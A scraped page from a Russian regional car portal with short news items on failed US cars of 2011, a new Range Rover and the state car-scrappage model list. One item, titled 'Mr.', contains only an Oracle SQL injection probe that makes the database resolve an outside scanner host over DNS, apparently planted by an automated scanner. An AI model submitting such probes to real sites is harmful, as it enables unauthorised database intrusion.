Главная     Мототехника     Автофирмы     Полезное     Автострахование     Доска обьявлений     Реклама     Автотюнинг     Карта сайта    
Предложения
Всего: 9 Посмотреть »

Личный кабинет

Погода

Предложения

Загрузка предложений ...

Партнёры

SolarStyle Studio разработка сайтов, хостинг, домены, дизайн.

Некоторые автоновости
04 января 2012г.
В США названы самые провальные автомобили 2011 года

Американское издание 24/7 Wall St. составило список самых провальных продуктов, появившихся на рынке США в текущем году. В рейтинг наряду с электронными устройствами и кинофильмами попали 2 автомобиля - гибридный электромобиль Chevrolet Volt и компактный хэтчбек Fiat 500.
Подробнее »
30 августа 2019г.
Mr.

'||UTL_INADDR.get_host_address('dns.'||'sqli.013405.529-41391.529.a9e86.1.bxss'||'.me')||'
Подробнее »
03 апреля 2012г.
Опубликованы фотографии Range Rover нового поколения

В прессу просочились фотографии нового Range Rover, который производитель внедорожников тестирует уже несколько месяцев. В продаже новинка должна появиться в начале следующего года.
Подробнее »
Утилизационный список пополнился новыми моделями
Минпромторг РФ расширил перечень автомобилей, участвующих в государственной программы по утилизации. Соответствующий приказ был подписан 23 апреля и опубликован в пятницу в "Российская газета". В перечень автомобилей были добавлены три модели калужского завода Volkswagen, две модели "ПСМА Рус", шесть моделей Ульяновского автозавода и две модели "Соллерс".

Список добавленных автомобилей выглядит так:


Volkswagen Passat

Skoda Yeti

Skoda Superb

УАЗ-3151

УАЗ-3163

УАЗ-469

УАЗ-2363

УАЗ-3164

UAZ Cargo

Peugeot 308

Citroen C4

SsangYong Rexton

SsangYong Kyron

Таким образом, в настоящее время по программе утилизации можно приобрести 79 автомобилей.

Государственная программа по утилизации стартовала 8 марта 2010 года. Она предлагает владельцам автомобилей возрастом более десяти лет сдать свою машину в утиль и получить скидку в 50 тысяч рублей для покупки нового автомобиля, произведенного на территории России. Всего планируется выдать 200 тысяч утилизационных сертификатов.

По информации от 22 апреля, Минпромторг выписал более 70 тысяч утилизационных свидетельств, по 25 тысячам из них уже были приобретены автомобили.


Источник: auto.lenta.ru

Реклама










Быстрый поиск

Загрузка поиска ...

Автофирмы Ставрополь

Загрузка автофирм...

Автоновости

Загрузка новостей...

Реклама

    Руководитель сайта: Артёмов Владимир Николаевич Разработка и поддержка сайта - SolarStyle Studio   
Rambler's Top100 Яндекс.Метрика